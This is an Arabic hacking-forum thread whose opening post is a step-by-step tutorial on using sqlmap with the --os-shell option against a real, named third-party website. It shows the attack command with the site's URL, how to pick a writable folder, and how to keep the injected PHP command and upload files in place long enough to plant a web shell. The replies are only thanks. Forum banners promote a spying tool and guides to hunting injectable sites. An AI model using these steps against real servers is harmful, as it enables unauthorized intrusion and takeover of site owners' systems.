1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
  3. الملاحظات
    عزيزي زائر حصرياً : التقنيات النهائية لإصتياد المواقع المٌصابة بثغرات الحقن يدوياً وألياً متابعة الموضوع
    إستبعاد الملاحظة
  1. Mr.7nsh
    rankrank
    Developer

    عضو منذ:
    ‏7 مارس 2013
    عدد المشاركات:
    55
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    نظام التشغيل:
    windows xp
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيفكم اخواني ان شاء الله بألف خير

    ندخل في الموضوع على طوول


    [​IMG]

    معانا موضوع عن اداة sqlmap في نظام كالي لينكس

    الكل يعرف الاداه انها للحقن في ثغرات sql لكن البعض مايعرف

    ان ممكن من الاداه ترفع شل وتاخذ راحتك في السيرفر نجي للمهم

    لازم نعرف مسار مجلد عليه تصريح 777 او اذا كان السيرفر صلاحياته يوزر حدد المسار اللي يعجبك

    واهم حاجه بعد الحقن لازم ماتقفل الsqlmap لين ماترفع

    شل لان بيحذف الملفات تلقائي اللي تم حقنها في الموقع نتابع ونشوف

    عندنا الان هذا الموقع

    [CODEE]http://www.microtekusa.com/products.php?KindID=6[/CODEE]


    نكتب هذا الامر في الترمنال


    [CODEE]sqlmap -u http://www.microtekusa.com/products.php?KindID=6 --os-shell[/CODEE]

    تابع معي الشرح المصور

    [​IMG]

    يطلع لنا هذا الشكل ونختار [4] PHP (default) بكتابة الرقم 4 مثل الصوره وانتر

    كتبنا رقم 4 لان الموقع يدعم PHP كل موقع وعلى حسب البرمجه اللي شغال عليها الموقع

    [​IMG]

    الصوره الثالثه هنا تطلع لنا خيارات الاول المسار

    الافتراضي والثاني المسار اللي انت تحدده يحقن فيه الملف وانا افضل

    المسار الثاني علشان اختار المجلد اللي يكون مصرح في اغلب

    الحالات نكتب رقم 2 وانتر وشوف وش بيطلع لك

    [​IMG]

    في هالصوره الحين لازم نكتب مسار المجلد

    اللي راح يحقن فيه الملف المطلوب وانا حددت مسار

    مصرح بعد التخمين على مجلدات الموقع

    [​IMG]

    [​IMG]

    في هذي الصوره الان يقولك تم الحقن بنجاح

    وهنا الخلاصه تم حقن ملفين الملف الاول هذا هو

    tmpbxgbe.php?cmd=ls -la

    والملف الثاني ابلود

    tmpunqmq.php

    ملاحظه مهمه جدا :: شوف اخر شي بعد ماتم حقن الملفين وش مكتوب

    calling OS shell. To quit type 'x' or 'q' and press ENTER

    يعني اذا تم كتابة حرف X او حرق q راح يتم حذف الملفين

    تلقائي وبكذا بعض الشباب راح يقول ماينفع الموقع لم يتم الحقن لازم

    تخليه مثل ماهو من غير ماتكتب اي شي لين ماترفع الشل

    الخاص فيك في الموقع وبعدها اكتب اللي تبي في الترمنال

    [​IMG]

    [​IMG]

    [​IMG]
     
    جاري تحميل الصفحة...
  2. HaMaM-HaCkEr
    DeveloPer Plus

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    110
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    بارك الله فيك أخي الكريم ماقصرت​
     
  3. PROCESSEUR.DZ
    rank
    Developer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    30
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الوظيفة:
    مصلح حواسب
    الإقامة:
    {عقلية DZ}
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    بارك الله فيك أخي الفاضل

    و يعطيك الصحة
     
  4. k!lwa s&rian ro0t Expert
    طاقم الإدارة

    عضو منذ:
    ‏3 أغسطس 2014
    عدد المشاركات:
    695
    الإعجابات المتلقاة:
    1,236
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    رائع اخي بارك الله فيك !
     
  5. (أوسكار)
    rank
    Developer

    عضو منذ:
    ‏5 نوفمبر 2012
    عدد المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    وعليكم السلام

    مشاء الله شرح واضح وكافي يالغالي

    مآقصرت
     
  6. M!st3я Y0u
    rankrank
    Developer

    عضو منذ:
    ‏19 ديسمبر 2011
    عدد المشاركات:
    70
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    30
    الوظيفة:
    تـلـمـيـذ
    الإقامة:
    TuNiSiA
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    شكراً جزيلاً اخي ..

    بارك الله فيك و جزاك الله خيراً .. :{2}:
     
  7. security alqasem
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏26 مايو 2014
    عدد المشاركات:
    54
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    عاشت ايدك حبي شرح حلو
     
  8. black.boy
    rank
    Developer

    عضو منذ:
    ‏29 مايو 2012
    عدد المشاركات:
    39
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    iran
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    يعطيك آلعآفيه..~!

    آستمرِ..~!
     
  9. V!rus-MarOc
    rankrank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    51
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    30
    الوظيفة:
    Hacker
    الإقامة:
    ©MAЯΘ
    نظام التشغيل:
    Linux
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    السلام عليكم
    بارك الله فيك أخي
    لا هنت أخي :{2}:
     
  10. Elite Trojan
    rankrank
    Developer

    عضو منذ:
    ‏20 ابريل 2012
    عدد المشاركات:
    65
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    رد: حقن الموقع بشل ابلود عن طريق لـ Injection site shell Upload sqlmap

    يعطيك العافية على الموضوع ,

    واصل يا مبدع [​IMG]
     

مشاركة هذه الصفحة

جاري تحميل الصفحة...